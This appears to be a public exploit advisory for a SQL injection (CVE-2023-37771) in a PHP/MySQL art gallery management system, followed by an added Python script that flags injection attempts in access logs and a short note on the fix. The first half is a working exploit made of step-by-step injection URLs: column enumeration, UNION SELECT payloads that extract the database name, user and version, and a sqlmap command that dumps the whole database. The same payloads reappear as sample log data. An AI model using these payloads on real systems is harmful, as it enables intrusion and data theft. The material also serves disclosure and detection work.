Exploit Title: Art Gallery Management System v1.0 - SQL Injection
Vendor of Product: https://phpgurukul.com/
Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
Tested on: Linux
Attack Type: Local
Steps to Reproduce:
1. Go to the Sculptures page by choosing the "ART TYPE" option in the navigation bar.
http://127.0.0.1/agms/product.php?cid=1&&artname=Sculptures
2. On this page, inserting a single quote into the "cid" parameter breaks the query, which shows that the "cid" parameter is vulnerable to SQL injection.
http://127.0.0.1/agms/product.php?cid=1'&&artname=Sculptures
3. Now comment out the remainder of the query:
http://127.0.0.1/agms/product.php?cid=1'--+&&artname=Sculptures
4. Now run an "order by" query to find the number of columns:
127.0.0.1/agms/product.php?cid=1' order by 6 --+&&artname=Sculptures
5. Now, by inserting the payload in the "cid" parameter, we obtain the database name, current user, and database version:
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,database(),5,6 --+&&artname=Sculptures
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,current_user(),5,6 --+&&artname=Sculptures
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,version(),5,6 --+&&artname=Sculptures
6. Now dump the whole database using sqlmap:
sqlmap -u http://127.0.0.1/agms/product.php?cid=1 --dump-all --batch
Reference: CVE-2023-37771
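Every request in the steps above has one property in common: the "cid" value sent to product.php is not a plain integer. The following Python script, added here as a detection example and not part of the advisory or the vendor's code, scans web-server access log lines for product.php hits whose decoded "cid" is non-numeric and labels them; the log lines are constructed to mirror the requests listed above.

```python
"""Flag non-integer `cid` values sent to /agms/product.php in access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in Apache combined-style format (not real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2023:10:00:00 +0000] "GET /agms/product.php?cid=1&&artname=Sculptures HTTP/1.1" 200 5120
127.0.0.1 - - [01/Jan/2023:10:00:05 +0000] "GET /agms/product.php?cid=1'&&artname=Sculptures HTTP/1.1" 500 312
127.0.0.1 - - [01/Jan/2023:10:00:09 +0000] "GET /agms/product.php?cid=1'%20order%20by%206%20--+&&artname=Sculptures HTTP/1.1" 200 5120
127.0.0.1 - - [01/Jan/2023:10:00:12 +0000] "GET /agms/product.php?cid=1'%20union%20all%20select%201,2,3,database(),5,6%20--+&&artname=Sculptures HTTP/1.1" 200 5210
127.0.0.1 - - [01/Jan/2023:10:00:20 +0000] "GET /agms/product.php?cid=2&&artname=Paintings HTTP/1.1" 200 4980
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULNERABLE_PATH = "/agms/product.php"


def decoded_cid(target):
    """Return the percent-decoded `cid` query value, or None if absent.
    parse_qs decodes %27 and '+' for us and skips the empty '&&' segment."""
    values = parse_qs(urlsplit(target).query).get("cid")
    return values[0] if values else None


def classify_cid(value):
    """Label a decoded cid. The application only ever expects an integer here."""
    if value is None:
        return "missing"
    if value.isdigit():
        return "ok"
    lowered = value.lower()
    if "union" in lowered and "select" in lowered:
        return "union-select"
    if "order by" in lowered:
        return "column-enumeration"
    if "'" in value or "--" in value:
        return "quote-or-comment-probe"
    return "non-numeric"


def scan_log(text):
    """Return (line_no, verdict, decoded cid) for each product.php hit with a non-integer cid."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match or urlsplit(match.group("target")).path != VULNERABLE_PATH:
            continue
        cid = decoded_cid(match.group("target"))
        verdict = classify_cid(cid)
        if verdict != "ok":
            findings.append((line_no, verdict, cid))
    return findings


if __name__ == "__main__":
    for line_no, verdict, cid in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {verdict}: cid={cid!r}")
```

The same non-integer check, applied server-side before the value reaches the query (or, better, a prepared statement with the value bound as an integer), is what removes the injection point the steps above rely on.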